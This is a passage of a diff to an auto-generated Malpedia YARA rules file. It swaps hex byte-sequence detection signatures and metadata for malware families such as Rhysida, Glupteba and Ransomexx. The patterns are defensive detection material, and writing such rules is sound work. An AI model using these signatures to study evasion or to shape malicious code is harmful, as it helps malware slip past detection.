"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chainshot_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gopuram_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ba9c33c28d22ea04923b796ce7a5cfd0e30c1f14b0a956e4cbe61344e61c7def" + logic_hash = "4e587acafeaded148024e517c8ecf7276743814969e25e84b3cedf8d114b44f9" score = 75 quality = 75 tags = "FILE" @@ -175995,32 +178676,32 @@ rule MALPEDIA_Win_Chainshot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 731b 85c9 7906 b840000000 } - $sequence_1 = { 8d68fc c70726000000 e9???????? c70709000000 bd02000000 } - $sequence_2 = { 7509 e8???????? 85c0 7808 } - $sequence_3 = { 6683f819 7705 8d4220 eb03 0fb7c2 0fb7c0 } - $sequence_4 = { b901070080 e8???????? eb89 8bd7 } - $sequence_5 = { 7408 ffd0 8905???????? bfa3000080 e9???????? } - $sequence_6 = { ffc8 0f843a110000 ffc8 7427 83e803 0f844a110000 } - $sequence_7 = { 7408 ffd0 8905???????? bb82000080 } - $sequence_8 = { 8d4a02 b8abaaaaaa f7e1 d1ea } - $sequence_9 = { ffc8 747a ffc8 7461 83e802 } + $sequence_0 = { e8???????? 48894308 4885c0 7412 418d562f 488bc8 e8???????? } + $sequence_1 = { 448bfb 48895dc7 8bcb 48895d9f 48895db7 48895d97 48895da7 } + $sequence_2 = { 8bc1 83e010 c1e804 898508010000 f6c104 7507 f6c108 } + $sequence_3 = { e8???????? eb21 c7442420210e0480 41b99e100000 4c8d05938b0600 8bd7 488bce } + $sequence_4 = { ff05???????? b801000000 4883c428 c3 ff0d???????? 751a 488b0d???????? } + $sequence_5 = { e9???????? 488b0d???????? 488b01 ff90f8000000 83f805 0f84e1fdffff 488b0d???????? } + $sequence_6 = { 66094354 8b8597000000 83c0fc 83f801 0f8755010000 488b742448 418bf9 } + $sequence_7 = { 89543104 488d051c8b0300 48898698040000 4889aea0040000 4889aea8040000 4889aeb0040000 488d8eb8040000 } + $sequence_8 = { 890d???????? c705????????09000380 8bcf 488d05ce350900 6690 3b70fc 7508 } + $sequence_9 = { bf01000000 e9???????? 488b0d???????? 488b01 ff90f8000000 83f805 7463 } condition: - 7 of them and filesize <802816 + 7 of them and filesize <1591296 } -rule MALPEDIA_Elf_Satori_Auto : FILE +rule MALPEDIA_Win_Rhysida_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef9a3def-11bf-57c1-9abe-eaf3ea87bbf4" + id = "64a6dc82-3050-56af-987a-eca5c9c0ccdc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.satori_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhysida_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "acc91f43f84cb8d9ebcbacb4d453867e5ba0d238d6255f05df970cd0ecb540bb" + logic_hash = "c700e285aaa62eb845c4c4a22ba3b4990a79a21d47e9845ba892bd45fa758d74" score = 75 quality = 75 tags = "FILE" @@ -176034,32 +178715,32 @@ rule MALPEDIA_Elf_Satori_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7804 8b542414 89d0 83c41c } - $sequence_1 = { e8???????? b9???????? b802000000 89ca e8???????? } - $sequence_2 = { 89c6 53 89d3 83ec10 52 e8???????? } - $sequence_3 = { b802000000 e8???????? b905000000 ba???????? b802000000 e8???????? b908000000 } - $sequence_4 = { c744244800000000 e9???????? 8b542404 8b3482 6bc018 03442464 } - $sequence_5 = { e8???????? 83c414 6a1f e8???????? c7042420000000 e8???????? c785280400001e000000 } - $sequence_6 = { 85c0 7416 83ec0c ff35???????? e8???????? 59 6a00 } - $sequence_7 = { 3b410c 747c 8b45bc 83ec0c 8b55cc 8d5def 8945e0 } - $sequence_8 = { 6a04 56 53 e8???????? 8844243a 83c420 6a00 } - $sequence_9 = { 6a15 68???????? 6a1d e8???????? 83c40c 6a15 68???????? } + $sequence_0 = { ba28000000 4889c1 e8???????? 8945f8 837df800 7407 b804000000 } + $sequence_1 = { 4863d0 488b4510 4801d0 0fb600 0fb6c0 8b55f4 c1ea06 } + $sequence_2 = { f6431920 0f84c7feffff 4983c101 e9???????? 4531c0 4889f2 89e9 } + $sequence_3 = { 8b45fc 4863c8 4889c8 48c1e002 4801c8 48c1e003 4889c1 } + $sequence_4 = { baafa96e5e 89c8 f7ea c1fa0b 89c8 c1f81f 29c2 } + $sequence_5 = { 8b45f8 4863d0 488b4510 4801d0 0fb600 0fb6d0 8b45f8 } + $sequence_6 = { e8???????? eb01 90 8b45f0 0faf45b8 89c2 488d45a0 } + $sequence_7 = { 85c0 74da 85db 4889742428 0f848d010000 8d4bff 488d742460 } + $sequence_8 = { c1e903 f348ab ff15???????? 83f812 7472 488b8b38020000 e8???????? } + $sequence_9 = { 5f 5d 415c 415d c3 b80d000000 ebd7 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <2369536 } -rule MALPEDIA_Win_Wpbrutebot_Auto : FILE +rule MALPEDIA_Win_Explosive_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ee6ef210-d105-53c3-a558-0e67b4040536" + id = "863a5681-ec58-58c3-aa41-9d8844c2c73c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wpbrutebot_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.explosive_rat_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "709c38b5efc64910ec1c02f61c4cfca810d098711a98c2359e209f406eb3230c" + logic_hash = "e75d842c394fc045ddd0745106b1430d3dd968c3b7d21e3af7bbb4c3b56a96a4" score = 75 quality = 75 tags = "FILE" @@ -176073,32 +178754,32 @@ rule MALPEDIA_Win_Wpbrutebot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894f54 897758 89775c e9???????? 85c9 7515 c7475003000000 } - $sequence_1 = { f7472c00010000 b35d 7411 8b4730 6a5d 8b4804 8b01 } - $sequence_2 = { f6044dc81e5e0002 7410 8bc1 ba01000000 83f020 85d2 0f44c1 } - $sequence_3 = { c645fc04 8d8dfcf4ffff e8???????? 68???????? 8bd0 c645fc05 8d8d14f5ffff } - $sequence_4 = { ff742420 8b7a08 037c2420 89442448 c744244c01000000 897c2450 8b4a08 } - $sequence_5 = { c781f0050000bfe45900 5b 83c408 c3 5f 5e 5d } - $sequence_6 = { 7228 8bb504ffffff 8d8504ffffff 50 8bc8 e8???????? 8b8518ffffff } - $sequence_7 = { 8b44245c a802 b800000000 0f45d8 895c241c 85f6 7410 } - $sequence_8 = { f7e9 d1fa 8bc2 c1e81f 03c2 83f801 762b } - $sequence_9 = { ffb7ec0c0000 6a01 53 e8???????? 8be8 83c410 } + $sequence_0 = { 8945c4 8b4514 8945c8 7611 33c0 8a03 8d4dc4 } + $sequence_1 = { 7445 6a03 8bc7 e8???????? 8b8648af0100 8bae44af0100 83c00a } + $sequence_2 = { 66832300 33c0 c9 c3 85c0 7515 } + $sequence_3 = { eb60 807e0400 7507 8bce e8???????? 807e0530 7c62 } + $sequence_4 = { 53 55 8b6c2448 8b4d04 8b4104 56 8bf1 } + $sequence_5 = { 85ed 75e5 83f808 896b14 720f 8b4304 5f } + $sequence_6 = { 68???????? 51 e8???????? 8b4c2468 8b7c245c 50 8b442470 } + $sequence_7 = { 8b442430 83c408 3bc7 720d 8b4c2414 51 e8???????? } + $sequence_8 = { 8d5dd0 e8???????? 46 ebb8 b8???????? e8???????? be???????? } + $sequence_9 = { 89ae88af0600 8bfa 7d2e 8a5c0aff 8a140a 885c241c 8854240f } condition: - 7 of them and filesize <5134336 + 7 of them and filesize <855040 } -rule MALPEDIA_Win_Billgates_Auto : FILE +rule MALPEDIA_Win_Glupteba_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2ccab9f1-e7c2-5897-af43-0d6c30857357" + id = "09a70f19-6d2a-5533-851a-d46346a3f052" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.billgates_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glupteba_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "e0a8f89c836a13df9d06b620bc16eb3744a9d5b82a5ea28cb550060f6d08f1fc" + logic_hash = "f2320a7d413271b6097cf4accf3d3e4465e91ebbc62274538ef55443d4833776" score = 75 quality = 75 tags = "FILE" @@ -176112,34 +178793,40 @@ rule MALPEDIA_Win_Billgates_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3c11 7408 3c22 7404 3c30 } - $sequence_1 = { 8d8809f9ffff b8c94216b2 f7e9 03d1 } - $sequence_2 = { 3c58 7507 b802000000 eb02 } - $sequence_3 = { 740c 3c11 7408 3c22 7404 3c30 } - $sequence_4 = { 3c10 740c 3c11 7408 } - $sequence_5 = { 83f8ff 750c ff15???????? 8bd8 f7db } - $sequence_6 = { 3c11 7408 3c22 7404 } - $sequence_7 = { ff15???????? 83f8ff 7508 ff15???????? f7d8 85c0 } - $sequence_8 = { 3c10 740c 3c11 7408 3c22 } - $sequence_9 = { 3c10 740c 3c11 7408 3c22 7404 } + $sequence_0 = { 33c8 c1e102 33c8 03c9 } + $sequence_1 = { ff75dc ff7508 ff75e2 e8???????? 83c410 ff35???????? ff15???????? } + $sequence_2 = { 50 8d85fcf7ffff 50 56 e8???????? 68e8030000 8d85fcf7ffff } + $sequence_3 = { 59 7e17 83c0fc 33c9 85c0 7e0e } + $sequence_4 = { 334e04 8b75d0 33cf 8b7ddc c1ef08 c1ee10 } + $sequence_5 = { 85c0 0f8435010000 807df473 7550 0fb745f7 50 } + $sequence_6 = { 0f8f9c010000 894df8 ff7518 53 53 e8???????? } + $sequence_7 = { 46 8975f8 83f810 7cd9 8d48f0 f7d9 1bc9 } + $sequence_8 = { 0101 03d3 8b4620 8bcb } + $sequence_9 = { 00cd 3e46 005e3e 46 } + $sequence_10 = { 0107 eb4d 8b02 89442418 } + $sequence_11 = { 00f1 3d46005e3e 46 00cd } + $sequence_12 = { 0012 3f 46 008bff558bec } + $sequence_13 = { 0106 830702 392e 75a0 } + $sequence_14 = { 005e3e 46 00ff 3e46 } + $sequence_15 = { 00ff 3e46 0012 3f } condition: - 7 of them and filesize <801792 + 7 of them and filesize <1417216 } -rule MALPEDIA_Win_Valley_Rat_Auto : FILE +rule MALPEDIA_Win_Boxcaon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5aadade8-2e86-5c22-9399-653890e95f9a" + id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.valley_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boxcaon_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "788630470fd0066c9dad5026f208a936da1b0fab9009cb8b3a3ebf9a9cd14823" - score = 60 - quality = 45 + logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -176151,32 +178838,32 @@ rule MALPEDIA_Win_Valley_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4910 e8???????? 2500020000 33d2 0bc2 7506 32c0 } - $sequence_1 = { e8???????? 50 8d4708 50 e8???????? 8bbdf0efffff 83c414 } - $sequence_2 = { 8bf0 83c404 85f6 742f e8???????? 84c0 ba???????? } - $sequence_3 = { 50 e8???????? 8b5654 33c9 8b4508 83c408 894d08 } - $sequence_4 = { 8d04dd00000000 50 e8???????? 8bf0 83c404 85f6 7447 } - $sequence_5 = { 8bc2 c1e81f 03c2 8d0c40 8b07 8d04c8 894704 } - $sequence_6 = { 8b55f4 4f 75ce 8b4df8 8b7d08 8b5510 3bca } - $sequence_7 = { 8b36 c6043e00 5f 5e 5d c3 55 } - $sequence_8 = { eb64 33c0 668945e4 e8???????? ff75dc 8b7b04 8d45e3 } - $sequence_9 = { c745fc00000000 53 8bce e8???????? 8b06 83f801 741e } + $sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? } + $sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 } + $sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? } + $sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a } + $sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff } + $sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 } + $sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? } + $sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? } + $sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 } + $sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 } condition: - 7 of them and filesize <2256896 + 7 of them and filesize <256000 } -rule MALPEDIA_Win_Kurton_Auto : FILE +rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f013ccb0-04a7-5f02-910f-ce10f5a3eef2" + id = "6a23a7a3-8360-570b-be01-5aa731924fe0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kurton_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypto_fortress_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "dc4903969616e73929d77cdaee0d726bcae8e439ec6bc053e08d133b52122f5e" + logic_hash = "cb9e8ad6d0528bcc920d7d8992919925e873e6ab7fd21de603b21e974fe6d2be" score = 75 quality = 75 tags = "FILE" @@ -176190,32 +178877,32 @@ rule MALPEDIA_Win_Kurton_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89542430 8d8c24b8000000 89542434 50 8954243c } - $sequence_1 = { 83c8ff eb1f 8bce 83e61f c1f905 8bc6 8b0c8da05b0210 } - $sequence_2 = { 33c0 8dbc2458010000 c744242800010000 f3ab 8d442428 8d8c2458010000 50 } - $sequence_3 = { 889c2478040200 e8???????? 89b42474040200 e9???????? b91f000000 } - $sequence_4 = { 64a100000000 50 64892500000000 81ecb8000000 8a442403 53 } - $sequence_5 = { 84c0 752b 8b442414 3bc3 } - $sequence_6 = { 8d88740a0000 8988280b0000 33c9 c780180b0000902f0210 } - $sequence_7 = { 83c410 c20400 68???????? e8???????? 6a00 6a00 6a01 } - $sequence_8 = { b91f000000 33c0 8dbc24ad000000 889c24ac000000 f3ab 66ab } - $sequence_9 = { 895de0 895ddc 895dfc 897de4 740a 803800 7405 } + $sequence_0 = { ffb5a8feffff e8???????? 68???????? ffb5a8feffff e8???????? } + $sequence_1 = { a3???????? 68???????? ff35???????? e8???????? 85c0 0f846f030000 } + $sequence_2 = { aa 3407 aa 045a aa } + $sequence_3 = { e8???????? 85c0 0f846f030000 a3???????? 68???????? ff35???????? e8???????? } + $sequence_4 = { ff35???????? e8???????? 85c0 0f8456060000 a3???????? 8d3dccec4000 33c0 } + $sequence_5 = { 2cff aa 2cf9 aa 2c4c } + $sequence_6 = { aa 2c4e aa 0444 aa 2cff aa } + $sequence_7 = { c9 c20800 55 8bec 83c4f8 8b4508 } + $sequence_8 = { aa 341b aa 2c27 aa 3441 aa } + $sequence_9 = { aa 340a aa 3421 aa 0433 aa } condition: - 7 of them and filesize <344064 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Combos_Auto : FILE +rule MALPEDIA_Win_Bluehaze_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1f17e5a0-ef31-5686-bb42-b8b65987952e" + id = "b806577a-57c1-570d-aa1c-22fa8aae198a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.combos_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluehaze_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "037e9ec47814518fd1ef388425768f46eed22a270b66cf4ee1793ac0871a3237" + logic_hash = "e848ac1af15ccfaaa261b6df2c92e0cbc62750d10a2cd1c781f26efdf23885e7" score = 75 quality = 75 tags = "FILE" @@ -176229,32 +178916,32 @@ rule MALPEDIA_Win_Combos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 68ffff1f00 8d45e4 50 } - $sequence_1 = { be???????? 8b4c2410 8bfb 8bc1 6a01 c1e902 f3a5 } - $sequence_2 = { 57 57 53 56 8b8dd8feffff } - $sequence_3 = { 89bdd4feffff 897dfc 8b4508 50 } - $sequence_4 = { 8d054c160110 83780800 754e b741 b35a b620 } - $sequence_5 = { 53 8d44240c 55 56 89442410 57 c744241000000000 } - $sequence_6 = { 740e 50 ff15???????? 830d????????ff c3 8b442404 c74050b0110110 } - $sequence_7 = { 7514 8b442408 8b4c2410 5e } - $sequence_8 = { 0bc5 33c1 8b848600ffffff 0bc7 5f 5e 5d } - $sequence_9 = { 83ec08 55 56 8b742414 85f6 0f8412010000 } + $sequence_0 = { 8d85f0feffff 50 8bcf ff15???????? 8b08 8b4904 } + $sequence_1 = { 745f 6a30 c7460800000000 e8???????? 83c404 85c0 } + $sequence_2 = { 0fbe56ff 4e 51 52 57 ffd3 83c40c } + $sequence_3 = { e8???????? 83c408 8bc8 ff15???????? 397314 7204 } + $sequence_4 = { 8d4f04 894e30 894e34 8d4708 8d4d10 894610 894614 } + $sequence_5 = { 68???????? 64a100000000 50 81ecec050000 a1???????? 33c5 8945ec } + $sequence_6 = { 83c420 8d14c500000000 2bd0 8b06 5b 8d0cd0 } + $sequence_7 = { 03c2 894508 753d 8b4604 8b0e 3bc8 0f8466010000 } + $sequence_8 = { 0b0b 010b 0b0b 0b0b 0b0b 0b0b 0b0b } + $sequence_9 = { 33db 8bc7 8bf1 c745e80f000000 895de4 885dd4 8d5001 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <424960 } -rule MALPEDIA_Win_Plaintee_Auto : FILE +rule MALPEDIA_Win_Pandora_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e3bbe66b-b26a-510d-8a1b-05b2e6f7426c" + id = "808a3fc1-f716-514d-83e0-324ab4b5c047" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plaintee_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pandora_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "8bcc878fa501588c97ae4d4926e84d32a4619fd799353944068271d6d4e36727" + logic_hash = "9af9b8ff0c31cb495b736863fe90279cd9d4c249691d7818a687e6d77e1bb76b" score = 75 quality = 75 tags = "FILE" @@ -176268,71 +178955,71 @@ rule MALPEDIA_Win_Plaintee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2404 6a00 8d542404 51 52 ffd0 8b4c2400 } - $sequence_1 = { 8bf1 6802020000 ff15???????? 85c0 740a b001 } - $sequence_2 = { 50 8d853c010000 50 8b8538010000 6a5a 52 } - $sequence_3 = { 8d442400 56 50 8bf1 6802020000 ff15???????? } - $sequence_4 = { 5e 81c490010000 c3 8bce } - $sequence_5 = { 85f6 74c6 8bce e8???????? } - $sequence_6 = { f3ab 66ab b900010000 33c0 } - $sequence_7 = { eb02 33f6 8bce e8???????? 8a8669010000 } - $sequence_8 = { 68ac010000 e8???????? 83c404 85c0 7412 } - $sequence_9 = { 750a b001 5e 81c490010000 c3 } + $sequence_0 = { 48ffcb 48899d60020000 48ffc6 c60300 4c8bc6 488d8d60020000 } + $sequence_1 = { 458bce 41c1c90b 4433c9 44895d40 418bce 458bc3 c1c906 } + $sequence_2 = { 4885c0 750a b880eeffff e9???????? 4d8bcf 48896c2420 4c8d442430 } + $sequence_3 = { 488d1d43ef0200 4885c0 7404 488d5820 8bcf e8???????? 8903 } + $sequence_4 = { 4c8d7c2430 4c2bff 4c8dab80010000 0f1f4000 0f1f840000000000 488bd5 498d4d0f } + $sequence_5 = { 418bf8 488bea 488bf1 4d85c9 7423 498b4128 } + $sequence_6 = { 4533b48db0050700 418bcb 44337014 c1e908 0fb6d1 8bcb } + $sequence_7 = { 452bf8 c1ed08 452be0 8d4147 41c1ef08 41c1ec08 458d48e6 } + $sequence_8 = { 4403d1 418bc9 4181c139a093fc 41c1c20a 4403d2 f7d1 410bca } + $sequence_9 = { 79da 85db 0f8538020000 4c8d45cf 498bd7 488d4db7 e8???????? } condition: - 7 of them and filesize <73728 + 7 of them and filesize <1032192 } -rule MALPEDIA_Win_Mrac_Auto : FILE +rule MALPEDIA_Win_Bunitu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f610a0ea-21d4-5420-9cb8-a0ef900d553a" + id = "fdd29b03-d926-5cbf-98be-29b287d71b21" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mrac_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bunitu_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "39e0c8c23990eee898b7d74c2127c69decfcb303742ac7378812e728f22f2f91" + logic_hash = "c3bd7c13018c7a8c4646040c13e12026479d672a4bbef2d99f41e09a2ac2f388" score = 75 quality = 75 tags = "FILE" version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { 8d8c24d40a0000 6a0f 888424ea0a0000 e8???????? 346c 8d8c24d40a0000 6a10 } - $sequence_1 = { 8d8c24c8030000 e8???????? 046e 8d8c24c4030000 6a77 888424c8030000 e8???????? } - $sequence_2 = { 6a0a 88842475060000 e8???????? 3451 8d8c2464060000 6a0b 88842476060000 } - $sequence_3 = { c684240b07000079 c684240c07000079 c684240d0700007b c684240e0700007e c684240f0700007e c684241007000032 c68424110700003d } - $sequence_4 = { 8d8c249c000000 6a27 888424a8000000 e8???????? 0454 8d8c249c000000 6a27 } - $sequence_5 = { 041d 342f 8885a1fbffff 8b8580fbffff 041e 3471 8885a2fbffff } - $sequence_6 = { 8d4c2460 6a4f 88442470 e8???????? 0456 8d4c2460 6a4f } - $sequence_7 = { 3462 8845b0 8b459c 0411 346a 8845b1 8b459c } - $sequence_8 = { 3474 8d8c2414050000 6a06 88842421050000 e8???????? 346f 8d8c2414050000 } - $sequence_9 = { 040f 3472 88842433140000 8b842420140000 0410 3469 } + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 68???????? 50 6a00 68???????? 6a00 50 ff15???????? } + $sequence_1 = { 58 6a02 ffb524fdffff ff15???????? ffb524fdffff } + $sequence_2 = { 50 ff75ec e8???????? 0bc0 7e18 50 } + $sequence_3 = { 48 40 8d443825 668b00 } + $sequence_4 = { c70003000000 ffb524fdffff 8f4004 ffb528fdffff 8f4008 } + $sequence_5 = { ffb524fdffff e8???????? eb12 6a08 68???????? ffb524fdffff e8???????? } + $sequence_6 = { 59 8bd0 8bdf b82f000000 } + $sequence_7 = { 895004 b9???????? 8d55fc 52 6800000100 50 51 } + $sequence_8 = { c70003000000 ff75f0 8f4004 ff75ec 8f4008 } + $sequence_9 = { 837df000 7614 6a02 ff75f0 ff15???????? } condition: - 7 of them and filesize <745472 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Nagini_Auto : FILE +rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "140c68e0-b1a0-5de4-9ceb-f9c4372ec960" + id = "6157b109-2151-5074-8840-c27487c07a25" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nagini_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whiteblackcrypt_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "3751db8355d7cf68abbb539627fa735abe39bfd76ce94371ffdf9eba2b1cc16c" + logic_hash = "f60c96c165ea27ee68f018ece2d6f92a309aa90e387cd2c1a16407c43ba45f47" score = 75 quality = 75 tags = "FILE" @@ -176346,32 +179033,32 @@ rule MALPEDIA_Win_Nagini_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0131 1f 0031 1f 003422 0337 } - $sequence_1 = { a3???????? eb18 6a00 6a00 6a00 6a00 } - $sequence_2 = { 83c408 85c0 0f8510010000 837c242808 8d442414 68???????? } - $sequence_3 = { 3422 0536240538 27 06 37 260537260535 230434 } - $sequence_4 = { 0a06 1408 0412 06 } - $sequence_5 = { 720e 4e 42 0fb606 80b87081420000 74e9 8b5ddc } - $sequence_6 = { 668944246c a0???????? 8844246e 8a4701 8d7f01 } - $sequence_7 = { 6689442444 0f8238020000 ff74242c e8???????? 83c404 e9???????? } - $sequence_8 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 } - $sequence_9 = { b3ac 98 b7b0 9c } + $sequence_0 = { 790d b910270000 ff15???????? ebea e8???????? b805000030 31c9 } + $sequence_1 = { 75ed 0f118fb0000000 4883c310 ebc4 4883c420 5b 5e } + $sequence_2 = { 4883ec38 83fa02 744c 7707 83fa01 745a eb4d } + $sequence_3 = { 75a2 5b 5e c3 4c8d4a10 48c1e104 } + $sequence_4 = { 488d0d583d0000 c705????????01000000 e8???????? 4885c0 7414 b801000000 } + $sequence_5 = { 4889c6 4889c7 4489f0 f3aa 4889f1 e8???????? } + $sequence_6 = { 4881ecb0030000 4c8d0504420000 31c0 41b9ffff0000 } + $sequence_7 = { 8801 48ffc1 ebe8 c3 55 } + $sequence_8 = { 7412 8d509f 80fa19 7703 } + $sequence_9 = { f20f2ad2 48895c2420 dd442420 f20f11542428 dd442428 d9c9 d9fd } condition: - 7 of them and filesize <12820480 + 7 of them and filesize <99328 } -rule MALPEDIA_Win_Mole_Auto : FILE +rule MALPEDIA_Win_Ransomexx_Auto : FILE { meta: description = "autogenerated rule brought 